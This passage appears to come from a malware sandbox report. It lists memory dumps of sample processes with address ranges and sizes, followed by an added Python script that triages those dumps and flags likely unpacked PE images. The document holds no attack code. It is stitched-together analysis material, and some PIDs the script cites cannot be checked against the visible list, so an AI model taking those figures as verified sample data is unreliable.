                                                                                                                                                                                      • memory/4188-349-0x00000000049A0000-0x0000000004A3D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        628KB

                                                                                                                                                                                      • memory/4188-348-0x0000000004830000-0x0000000004894000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        400KB

                                                                                                                                                                                      • memory/4188-350-0x0000000000400000-0x000000000442B000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64.2MB

                                                                                                                                                                                      • memory/4224-331-0x0000000000400000-0x00000000043D1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        63.8MB

                                                                                                                                                                                      • memory/4224-330-0x0000000004420000-0x000000000444F000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        188KB

                                                                                                                                                                                      • memory/4272-259-0x0000000007190000-0x00000000071BE000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        184KB

                                                                                                                                                                                      • memory/4272-260-0x0000000007260000-0x0000000007261000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4272-253-0x0000000004A50000-0x0000000004A51000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4272-245-0x00000000002A0000-0x00000000002A1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4424-358-0x0000000004C90000-0x0000000004C91000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4440-264-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4440-268-0x000000000E1E0000-0x000000000E1E1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4440-266-0x0000000005350000-0x0000000005351000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4440-267-0x0000000005360000-0x0000000005370000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/4440-270-0x00000000013B0000-0x00000000013B1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4564-286-0x0000000004A80000-0x0000000004A81000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4608-317-0x00007FF96A480000-0x00007FF96A779000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3.0MB

                                                                                                                                                                                      • memory/4780-293-0x000000001AF40000-0x000000001AF42000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        8KB

                                                                                                                                                                                      • memory/4848-359-0x0000000077DD0000-0x0000000077F5E000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.6MB

                                                                                                                                                                                      • memory/4848-360-0x0000000005120000-0x0000000005121000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4852-352-0x0000000004950000-0x00000000049ED000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        628KB

                                                                                                                                                                                      • memory/4852-353-0x0000000000400000-0x0000000004429000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64.2MB

                                                                                                                                                                                      • memory/4852-351-0x00000000047A0000-0x0000000004804000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        400KB

                                                                                                                                                                                      • memory/4984-361-0x0000000004C40000-0x0000000005246000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6.0MB

                                                                                                                                                                                      • memory/5004-362-0x00000000053E0000-0x00000000059E6000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6.0MB

                                                                                                                                                                                      • memory/5088-300-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB
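The dump list above is long, and the useful signal in it is which regions are worth opening first. The following Python script is an added example, not part of the tria.ge report or its tooling: it parses the dump names, checks each stated Filesize against the address range, groups regions by PID, and flags dumps whose range starts at 0x400000 (the default ImageBase of a 32-bit PE executable, so the usual location of a dumped main module or unpacked payload). The naming convention memory/<pid>-<index>-<start>-<end>-memory.dmp is an assumption inferred from the entries, and the sample rows are copied from the listing above.

```python
import re
from collections import defaultdict

# Assumed naming convention for the report's dump names (inferred from the listing):
#   memory/<pid>-<index>-<start>-<end>-memory.dmp, addresses in hex
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<index>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
SIZE_RE = re.compile(r"^(?P<num>\d+(?:\.\d+)?)(?P<unit>KB|MB)$")

# Default ImageBase of a 32-bit PE executable; a dump starting here is usually a
# dumped main module rather than a heap, stack or loaded-DLL region.
PE_DEFAULT_IMAGE_BASE = 0x400000

# Constructed sample input: dump names and stated sizes copied from the listing above.
SAMPLE_DUMPS = [
    ("memory/2084-226-0x000001C20A980000-0x000001C20A9F1000-memory.dmp", "452KB"),
    ("memory/2156-171-0x0000000001000000-0x000000000101F000-memory.dmp", "124KB"),
    ("memory/2468-135-0x0000000000400000-0x000000000051E000-memory.dmp", "1.1MB"),
    ("memory/4188-350-0x0000000000400000-0x000000000442B000-memory.dmp", "64.2MB"),
    ("memory/4224-330-0x0000000004420000-0x000000000444F000-memory.dmp", "188KB"),
    ("memory/4440-264-0x0000000000BB0000-0x0000000000BB1000-memory.dmp", "4KB"),
    ("memory/4848-359-0x0000000077DD0000-0x0000000077F5E000-memory.dmp", "1.6MB"),
]


def parse_dump_name(name):
    """Split a dump name into pid, index and address range; raise on malformed input."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start:
        raise ValueError(f"empty or inverted range in {name}")
    return {"pid": int(m["pid"]), "index": int(m["index"]),
            "start": start, "end": end, "length": end - start}


def human_size(nbytes):
    """Render a byte count the way the report does: whole KB below 1 MiB, one decimal MB above."""
    if nbytes < 1024 * 1024:
        return f"{nbytes // 1024}KB"
    return f"{nbytes / (1024 * 1024):.1f}MB"


def triage_dumps(entries):
    """Validate each stated size against its address range and flag likely PE image dumps.

    Returns the per-dump records and a per-PID summary (region count, total bytes dumped).
    """
    records = []
    per_pid = defaultdict(lambda: {"regions": 0, "bytes": 0})
    for name, stated in entries:
        info = parse_dump_name(name)
        if not SIZE_RE.match(stated):
            raise ValueError(f"unrecognised size: {stated}")
        info["stated"] = stated
        info["size_consistent"] = human_size(info["length"]) == stated
        # Regions mapped at the default 32-bit image base are the first place to look for an
        # unpacked payload; very large ones (tens of MB) are typical of inflated droppers.
        info["pe_image_candidate"] = info["start"] == PE_DEFAULT_IMAGE_BASE
        records.append(info)
        per_pid[info["pid"]]["regions"] += 1
        per_pid[info["pid"]]["bytes"] += info["length"]
    return records, dict(per_pid)


if __name__ == "__main__":
    recs, summary = triage_dumps(SAMPLE_DUMPS)
    for r in recs:
        flag = " <- PE image candidate" if r["pe_image_candidate"] else ""
        ok = "ok" if r["size_consistent"] else "MISMATCH"
        print(f"pid {r['pid']:>5} {r['start']:#018x}-{r['end']:#018x} "
              f"{r['stated']:>7} [{ok}]{flag}")
    for pid, s in sorted(summary.items()):
        print(f"pid {pid}: {s['regions']} region(s), {human_size(s['bytes'])} dumped")
```

Run against the full listing, the PIDs with a 0x400000 region (2468, 2620, 4188, 4224, 4852) are the ones to carve for PE headers first; the many 4KB dumps are almost always single-page stubs (hook trampolines, small config blobs) and can be reviewed later.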
